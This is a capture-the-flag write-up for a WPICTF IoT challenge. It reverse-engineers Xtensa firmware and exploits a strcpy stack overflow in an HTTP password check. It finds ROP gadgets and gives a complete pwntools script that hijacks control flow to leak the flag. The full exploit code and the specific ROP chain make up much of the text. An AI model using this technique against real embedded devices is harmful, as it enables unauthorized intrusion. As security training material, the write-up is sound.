We are given the source code of some IoT device, the "redacted" compiled binary and the site that is supposedly related to the device.
The "redacted" binary has values of WEBSITE_HTML, PASSWORD (which is "thatturnsmeon", by the way) and ssid ("wpictfpinet"),
but the flag is replaced by "WPI{XXXXXXXXXXXXXXXXXX}". The content of the site matches WEBSITE_HTML,
but HTTP headers reveal nginx as a proxy.
The site links a YouTube translation [https://www.youtube.com/embed/99aCwPd_DB8](https://www.youtube.com/embed/99aCwPd_DB8) that supposedly
shows the device itself, which is fun but not really useful for the solution.

The vulnerability is in `handle_request()`, for `http://<site>/check_password?password=XXX`
it `strcpy`-s `XXX` into a fixed-size buffer `char password[32]`.
`XXX` is selected by a bunch of `strtok()`s, which means that some characters are forbidden:
no zero characters (`handle_request()` operates with C strings), no '\n' and '\r' and no space (HTTP stuff),
and no '?' and '='. We also have a convenient function `send_flag()` that, unsurprisingly, sends the flag
to the client identified by its only parameter; it is supposed to be a separate response,
but the code does not set Content-Length header, so if we manage to direct the control flow to `send_flag()`
after `handle_request()` has finished, the second response will be interpreted as a continuation of data,
so we will see the flag. `send_flag()` is never called but referenced by the address.

Now it's time to investigate the compiled binary more closely. `file challenge.ino.elf_redacted` says
`ELF 32-bit LSB executable, Tensilica Xtensa, version 1 (SYSV), statically linked, with debug_info, not stripped`.
Xtensa isn't exactly the most-studied architecture, but [https://github.com/BlackVS/ESP32-reversing](https://github.com/BlackVS/ESP32-reversing) has some useful links,
including the instruction set reference and IDA processor plugin. So we don't need to decode bits manually, but still,
no automatic ROP finder or anything.

The vulnerable part in the disassembly:
.irom0.text:40201DE7 call0 strtok
.irom0.text:40201DEA mov.n a3, a2
.irom0.text:40201DEC beqz a2, loc_40201D42
.irom0.text:40201DEF mov.n a2, a1
.irom0.text:40201DF1 call0 strcpy
.irom0.text:40201DF4 movi.n a2, 0
.irom0.text:40201DF6 s8i a2, a1, 0x1F
.irom0.text:40201DF9 mov.n a2, a1
.irom0.text:40201DFB call0 _Z14check_passwordPc ; check_password(char *)
.irom0.text:40201DFE mov.n a3, a2
.irom0.text:40201E00 mov.n a2, a13
.irom0.text:40201E02 j loc_40201E18
.irom0.text:40201E18 loc_40201E18: ; CODE XREF: handle_request(WiFiClient &,char *)+DA↑j
.irom0.text:40201E18 call0 _Z21send_message_responseR10WiFiClientPc ; send_message_response(WiFiClient &,char *)
.irom0.text:40201E1B j loc_40201E2C
.irom0.text:40201E2C loc_40201E2C: ; CODE XREF: handle_request(WiFiClient &,char *)+81↑j
.irom0.text:40201E2C ; handle_request(WiFiClient &,char *)+F3↑j
.irom0.text:40201E2C l32i.n a0, a1, 0x2C
.irom0.text:40201E2E l32i.n a12, a1, 0x28
.irom0.text:40201E30 l32i.n a13, a1, 0x24
.irom0.text:40201E32 l32i.n a14, a1, 0x20
.irom0.text:40201E34 addi a1, a1, 0x30
.irom0.text:40201E37 ret.n
`.n` suffix is for "narrow" (2-bytes vs 3-bytes encoding) and apparently can be simply ignored while reverse-engineering.
`a1` is the stack pointer, `ret` jumps to `a0`, `a2` holds the first argument when entering a function
and the return value when exiting. During `handle_request()`, `password` (the only local variable) is at the top of the stack,
then saved values of `a14` (`[a1+0x20]`), `a13` (`[a1+0x24]`), `a12` (`[a1+0x28]`) and the return address (`[a1+0x2C]`) follow.

Note: it seems that Xtensa supports a feature like [https://en.wikipedia.org/wiki/Register_window](https://en.wikipedia.org/wiki/Register_window) , when there are no explicit save/load commands
at the entry/exit of all functions, instead save/load occurs in bulk when the corresponding buffer overflows;
searching the net for xtensa pwn will likely direct to discussions about how to defeat this feature;
however, it is disabled here, no need to worry about it.

So we want to make a call to `send_flag()` at 0x40201A90 while setting `a2` to the address of `client`. `handle_request()`
takes this address in `a2` that is long gone at the point where we can change the control flow; the caller `handle_connection()`
keeps it in `a12` that we are going to rewrite with buffer overflow and can not read; so we should get it as a stack address
of a local variable inside `loop()`, after return from `handle_request()` it will be at `a1+0x30` (`handle_connection()` uses
0x30 bytes of stack space). Also, 0x40201A90 when interpreted as a byte sequence contains a space,
so we can not use this address in our payload directly. Actually, the same holds for any 0x4020xxxx address, so a large part
of the code is excluded from possible ROP gadgets.

ROP gadgets can be of two types, ending with ``ret`` and ending with an indirect call/jump.
It is easy to find a gadget of the first type that adjusts the stack to the given amount and possibly
restores non-volatile registers `a12..a15` with constant values from the payload; however, it seems unlikely to obtain a stack address
in this way (returning address of a local variable is almost always a bug). Searching for the instruction for indirect calls `callx0`,
after a while we can find the following gadget:
.irom0.text:40221CCC l32r a5, off_40221C04 ; .int unk_3FFEE7E0
.irom0.text:40221CCF addx4 a5, a13, a5
.irom0.text:40221CD2 l32i.n a5, a5, 0
.irom0.text:40221CD4 beqz.n a5, loc_40221CE5
.irom0.text:40221CD6 mov.n a3, a14
.irom0.text:40221CD8 l8ui a4, a14, 1
.irom0.text:40221CDB mov.n a2, a1
.irom0.text:40221CDD addi.n a4, a4, 2
.irom0.text:40221CDF extui a4, a4, 0, 8
.irom0.text:40221CE2 callx0 a5
This gadget fetches a function address from `[0x3FFEE7E0+a13*4]` into `a5` and calls it with `a2 = a1` (and some manipulations
with `a3` and `a4` that are not important for us, except that we should make `a14` a readable address). This solves both problems,
how to load a stack address into `a2` and how to encode the address of `send_flag()` in the payload without spaces; dword at 0x40201EF8
(referenced from `setup()`) contains 0x40201A90, so it is sufficient to make `0x3FFEE7E0+a13*4 == 0x40201EF8`. Arithmetically
it means 0x84DC6 for `a13`, but we must avoid zero bytes, so we'll use 0x80084DC6 instead. It remains to adjust the stack by another gadget:
from pwn import *
context.log_level = 'debug'
payload = (b'A' * 32
+ p32(0x44444444) # a14
+ p32(0x80084DC6) # a13
+ p32(0x45454545) # a12
+ p32(0x40221CEF) # a0: l32i a0,a1,0xC / addi a1,a1,0x30 / ret.n
+ b'B' * 0xC
+ p32(0x40221CCC))
assert b' ' not in payload
assert b'?' not in payload
assert b'=' not in payload
assert b'\0' not in payload
assert b'\n' not in payload
assert b'\r' not in payload
r = remote('iot105fja983j.wpictf.xyz', 80)
r.send(b'GET /check_password?password=' + payload + b' HTTP/1.1\r\nHost: iot105fja983j.wpictf.xyz\r\nConnection: close\r\n\r\n')
and take the flag `WPI{iotisbaddontuseiot}` from the output.